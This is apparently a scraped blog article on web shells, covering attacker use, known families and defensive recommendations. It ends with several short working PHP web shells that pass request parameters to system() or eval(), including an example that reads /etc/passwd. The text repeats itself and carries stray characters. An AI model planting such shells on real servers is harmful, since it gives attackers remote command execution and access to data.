Web Shells - The Masquerade and Passive Implants that Escalate Privileges
In cybersecurity, shells are software programs or scripts that can be used to gain unauthorized access to systems and networks. Web shells are a type of shell that can be executed on a web server to allow remote administration and launch additional attacks. It is a tool that bad actors may use to interact with and maintain access to a system, after an initial compromise. Web shells are difficult to detect because they can be hidden within seemingly innocuous files. They are frequently used to going from a Local File Inclusion (LFI) vulnerability to having the ability to run commands on the system. From there, depending on attacker objectives, further reconnaissance can be done, or further exploits deployed to elevate privileges, pivot, and maintain persistence. Threat actors first penetrate a system or network and then install a web shell. From this point onwards, they use it as a permanent backdoor into the targeted web applications and any connected systems. Privilege escalation is a technique by which an attacker gains initial access to a limited or full interactive shell of a basic user or system account with limited privileges. A web shell is a shell-like interface that enables a web server to be remotely accessed, often for cyberattacks. A web shell is unique in that a web browser is used to interact with it. A web shell could be programmed in any programming language that is supported on a server. Threat actors first penetrate a system or network and then install a web shell. From this point onwards, they use it as a permanent backdoor into the targeted web applications and any connected systems. Shells are used in privilege escalation to send and receive shells to and from target machines. Low hanging fruits are checked first, after all these options fail then you attempt more advanced techniques.? Attackers use web shells to obtain backdoor access to the web server and often move laterally across the network to search for assets and other sensitive data to steal. These web shells can range from simple PHP scripts that just execute a small shell command to deeper and more sophisticated ones that can dump database tables and even launch widespread distributed denial-of-service (DDos) attacks.?
A shell is a user interface for access to operating system services. A reverse shell is a remote shell, where the connection is made from the system that offers the services to the client that wants to use these services. Attackers can also use web shells instead of reverse shells. Both internet-facing and non-internet-facing servers (such as resource hosting servers) could fall victim to web shell attacks.?If a web shell is successfully implanted into a web server, it enables a remote attacker to execute malicious commands and steal data.?Shodan surfaces all internet-connected devices, including web servers and endpoints, that could serve as attack vectors to hidden web servers. Once a vulnerability is discovered, cyberattacks immediately launch a web shell attack before a patch for the exposure is installed. After the web shell has been installed, a backdoor is naturally established, giving cybercriminals direct remote access to the compromised web server at any time. web shell traffic is legitimate website traffic; when a client requests a URL, and a response is returned. Further, as most sites now run HTTPS/TLS, this traffic is also encrypted. Finally, HTTP is by far the most used protocol, and any site with a lot of traffic will have many thousands of requests per second that would need to be inspected to detect malicious activity. These facts, taken together, mean that unless a defender is carefully inspecting the URL requested, the contents of the request and response, and the presence of malicious files in their web application directories, there is a good chance attacker activity will go unnoticed. Hackers prefer the web shell attack because of its easy remote access and concealed work, which is hard to find. The efficiency of back door creation with web shells is the reason why web shell attacks are primarily used as persistence mechanisms - the establishment of a long-term malicious internal network presence. Web shells are difficult to detect because they can be hidden within seemingly innocuous files. There are many other web shell injection strategies including the detection and compromise of Exposed Admin Interfaces, Cross-Site Scripting (XSS), and SQL injections.?
The efficiency of back door creation with web shells is the reason why web shell attacks are primarily used as persistence mechanisms - the establishment of a long-term malicious internal network presence. Organizations can gain insight into potential web shell activity by analyzing highly available NetFlow data. The network profile of client interaction with a web server when searching for an attack vector is distinct from interaction with a web shell that has been successfully operationalized. Adversaries then have several options in front of them, depending on their ultimate motivation may remotely execute arbitrary code or commands, as well as move laterally within the network, or deliver additional malicious payloads. These file-upload web shells are simple, lightweight, and easily overlooked because they cannot execute attacker commands on their own. Instead, they can only upload files, such as full-featured web shells, onto web servers. Because of their simplicity, they are difficult to detect and can be dismissed as benign, and so they are often used by attackers for persistence or for initial stages of exploitation. Also, attackers are known to hide web shells in non-executable file formats, such as media files. Web servers configured to execute server-side code create additional challenges for detecting web shells, because on a web server, a media file is scanned for server-side execution instructions. Attackers can hide web shell scripts within a photo and upload it to a web server. When this file is loaded and analyzed on a workstation, the photo is harmless. But when a web browser asks a server for this file, malicious code executes on the server side. Microsoft helps defend networks against web shell attacks by using a combination of durable protections that prevent web shell installation and behavior-based detections that identify related malicious activity. Microsoft Defender for Endpoint exposes malicious behavior by analyzing script file writes and process executions. Finding a web shell, post the attack is easier than before it happens. Cybercriminals use web shells for various attack scenarios: Exfiltrating and collecting sensitive data and credentials, installing malware that could create a path for further infection, defacing websites, redirecting traffic to advertising materials, placing links to third-party resources, redirecting users to special exploit kits to infect their computer. If someone tries to access the web shell page without proper authentication, it will display an HTTP ERROR 404 page after waiting for 10 seconds to emulate a page loading. This functionality helps prevent unauthorized users from easily finding the web shell, making it less conspicuous and reducing the chance of the page drawing unwanted attention. Persistent threats that open back doors to targeted systems can be just as dangerous as cyberattacks that pose more immediate risks. These slow-acting hacks rely on malicious scripts uploaded to a web server that permit an attacker to administer or control the server remotely.?
Notable Examples: ?
China Chopper is a web shell that allows attackers to retain access to an infected system using a client-side application, which contains all the information required to control the target.?
?X-Zone web shells were a new development to the cybersecurity world not long ago and is primarily obfuscated with gzip and Base64. This form of web shell features basic functionality, like getting system information, checking ports, reading and writing files, creating folders, uploading and downloading, and executing files.?
?WSO is a form of web shell is a PHP script and is generally obfuscated using simple techniques like string replacement, gzip, and Base64. This form of web shell avoids web crawlers from search engines like Google, Yahoo, Bing, and more. This is done so the web shell is not discovered or listed in search results. WSO stands for web shell by Orb.?
?C99: It is the advanced version of WSO, which is included with additional features. It can display the server’s security measures and self-deletion features.?
?B374K: It is developed in the PHP programming language with general functions of viewing the data and executing the commands.?
Recommendations:?
Routinely update and patch all software and operating systems to identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Perform general system hardening, including removing services or protocols where they are unnecessary and being aware of all systems exposed directly to the internet.?Frequently audit and review logs from web servers for unusual or anomalous activity. Web shells are a common way for attackers to gain the ability to run commands on a server and avoid detection by hiding in the “noise” of normal web traffic. They are very customizable and flexible tools requiring modest technical skills. For a targeted organization, they can be devastating, leading to data exfiltration, installation of malware, and further reconnaissance of their environment by attackers. Deploy filesystem anomaly detection. The least privilege principle can help prevent threat actors from uploading a web shell to vulnerable applications. You can set it by not enabling web applications to directly write to a web-accessible directory or modify web-accessible code. Organizations should employ several technologies when implementing intrusion prevention. When used together, IPS and WAF solutions can each monitor the flow of traffic and block known malicious uploads. Ideally, each security appliance introduced into the ecosystem should be tailored to the specific needs of the organization. Isolating a demilitarized zone (DMZ) subnet, for example, is a basic technique that can quarantine internet-facing servers. There are also more advanced network segregation techniques, such as software-defined networking (SDN), which can help implement a zero-trust architecture. Certain Endpoint Detection and Response (EDR) and host logging solutions can help protect against web shell attacks. These solutions monitor system calls and process lineage abnormalities and use patterns of malicious behavior to detect web shells.?
Automated Systems is used to analyze the content of the uploaded files by comparing it with the existing web shell to find the malicious codes. A timestamp is the information of the occurrence of a certain event which includes data and time. All files on the webserver are timestamped, making it easy to analyze the files with an odd timestamp. The configuration of web servers and web applications should be strong enough to protect from web shell and other threats. User input validation can prevent local or remote file inclusion vulnerabilities. For a targeted organization, they can be devastating, leading to data exfiltration, installation of malware, and further reconnaissance of their environment by attackers. Secure configuration of the web server and close or block ports and services which are not used. Use user input data validation to limit local and remote file inclusion vulnerabilities. Check content security policies to specify and control which resources can be loaded to web pages, and which users can access system utilities and directories. Mitigation steps for compromised systems may include backing up the configuration of the appliance, restoring it to factory settings and then upgrading it to the version that was running prior to factory reset. Changing passwords and access permissions is critical. Reset the admin password and application programming interface keys stored on the appliance, passwords for local users defined on the gateway and license server credentials. Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports. Practice good credential hygiene. Limit the use of accounts with local or domain admin level privileges. Antivirus and IDS vendors do inspect traffic and files and have signatures that can match commonly encountered web shells.?
?Samples of Web Shell Scripts?
?<!DOCTYPE html>?
<html>?
<head>?
<title>example webshell</title>?
</head>?
<body>?
<?php?
???? system($_GET['cmd']);?
?>?
</body>?
</html>?
??
??
<html>?
<body>?
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">?
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">?
<input type="SUBMIT" value="Execute">?
</form>?
<pre>?
<?php?
??? if(isset($_GET['cmd']))?
??? {?
领英推荐
??????? system($_GET['cmd'] . ' 2>&1');?
??? }?
?>?
</pre>?
</body>?
</html>?
??
echo(system($_GET["q"])); ?> This script will read a user-provided value and pass it on to the underlying operating system as a shell command.?
??
< ?php?
// Adversary sends POST with variable ‘1’ = ‘system’ and ‘2’ = ‘cat /etc/passwd’?
$_= $_POST['1'];?
$__= $_POST['2'];?
//The following will now be equivalent to running -> system(’cat /etc/passwd’);?
$_($__);?
?>?
??
<?php?
?? echo(system($_GET["q"]));?
?>?
??
<?php?
?? eval($_GET["q"]);?
?>?
?Some of the “suspicious” webshells that are more popular with attackers are the following: C99, R57, C100, PHPjackal, Locus?
Conclusion:?
Web shells are a common way for attackers to gain the ability to run commands on a server and avoid detection by hiding in the “noise” of normal web traffic. They are very customizable and flexible tools requiring modest technical skills. For a targeted organization, they can be devastating, leading to data exfiltration, installation of malware, and further reconnaissance of their environment by attackers. The web shell can be used to maintain a persistent connection with the webserver for a longer period. It can be used as a command-and-control server for the botnet or other vulnerable networks. A botnet is a network of hacked systems generally used for DDoS (distributed denial of service) attacks. Here, the system’s data is not stolen, but the device is used as a resource to perform an attack. The hidden danger of web shells is their stealthiness and versatility, making them a challenging threat to uncover and neutralize. It is essential to follow strict preventive measures to protect the webserver from persistent cyber threats, which could penetrate deep into the server when it becomes unnoticed.?
References:
https://www.bankinfosecurity.com/attackers-increasingly-using-web-shells-to-create-backdoors-a-14179 ?
?